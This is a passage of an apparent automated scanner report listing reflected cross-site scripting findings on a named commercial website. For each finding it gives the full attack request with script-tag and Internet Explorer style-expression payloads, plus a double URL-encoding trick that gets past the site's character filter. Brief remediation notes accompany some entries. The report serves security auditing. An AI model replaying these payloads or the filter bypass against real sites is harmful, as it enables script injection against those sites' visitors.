The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bdc"><script>alert(1)</script>30cb10048cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?c5bdc"><script>alert(1)</script>30cb10048cf=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/flowchart.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17f1"><script>alert(1)</script>da242985d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?d17f1"><script>alert(1)</script>da242985d73=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75 was submitted in the REST URL parameter 3. This input was echoed as 1b6e6"><script>alert(1)</script>255e7c83b75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75?id=343769/x22/x3eBuy HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:30 GMT Content-Length: 8886 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/ Set-Cookie: ASP.NET_SessionId=c2zv45jn1eebgs45s0y1xfqm; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a was submitted in the REST URL parameter 3. This input was echoed as 5919c"style="x:expression(alert(1))"d2a7fce664a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/ Set-Cookie: ASP.NET_SessionId=obr3du45zbuce445aaaygqnk; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670 was submitted in the REST URL parameter 3. This input was echoed as 2c172"><script>alert(1)</script>9f436bf2670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670?id=343769/x22/x3eBuy HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/ Set-Cookie: ASP.NET_SessionId=iunkdq55f4mrs0zhymery055; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 was submitted in the REST URL parameter 3. This input was echoed as 6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1q0jrzerd2axjnu1z4yq5c55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8830 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e89d"><script>alert(1)</script>e8ef8708314 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420fb"><script>alert(1)</script>680e9c0cc7 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f2b"><script>alert(1)</script>00c78a59a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaa"><script>alert(1)</script>366bac39d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217 was submitted in the REST URL parameter 2. This input was echoed as 1fb77"><script>alert(1)</script>1ed6dd36217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217?id=104640/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/ Set-Cookie: ASP.NET_SessionId=rgc5ewevo3ic5ebzjtk3pcfy; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a was submitted in the REST URL parameter 2. This input was echoed as 16ab3"style="x:expression(alert(1))"63feb98e41a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/ Set-Cookie: ASP.NET_SessionId=xznk3xfpvt4fwq45lltljxjn; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8746 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8 was submitted in the REST URL parameter 2. This input was echoed as fff10"><script>alert(1)</script>a7102c9c5a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/smartdraw.aspfff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8?id=104640/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1kyde4v2dk5z4w45pkuoyr55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8900 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 was submitted in the REST URL parameter 2. This input was echoed as 46591"style="x:expression(alert(1))"94313ed1278 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/ Set-Cookie: ASP.NET_SessionId=2ksoxp55cqqywc453rftb3vt; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8746 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bb8"><script>alert(1)</script>626eeb09dab was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb8"><script>alert(1)</script>02409d83cd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.192. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a0d8"><script>alert(1)</script>19f5f3d2721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.193. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6931"><script>alert(1)</script>1538439b5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2 was submitted in the REST URL parameter 1. This input was echoed as 37c3c"style="x:expression(alert(1))"e679ad699d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=o1ruv145ogifusajxf15cv45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21 was submitted in the REST URL parameter 1. This input was echoed as 5cd21"style="x:expression(alert(1))"9340ce36f21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0vrtws45owfyd0ykewtjomyf; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 was submitted in the REST URL parameter 2. This input was echoed as 5ce71"style="x:expression(alert(1))"1f48f65f3b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:09 GMT Content-Length: 8739 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/ Set-Cookie: ASP.NET_SessionId=lyrquzi1ro0haeato0nugmis; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 was submitted in the REST URL parameter 2. This input was echoed as 20991"style="x:expression(alert(1))"284b0792e42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/x2220991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=oo5bbiaclrpecvf51w0jwaml; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.198. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/support/x22
Issue detail
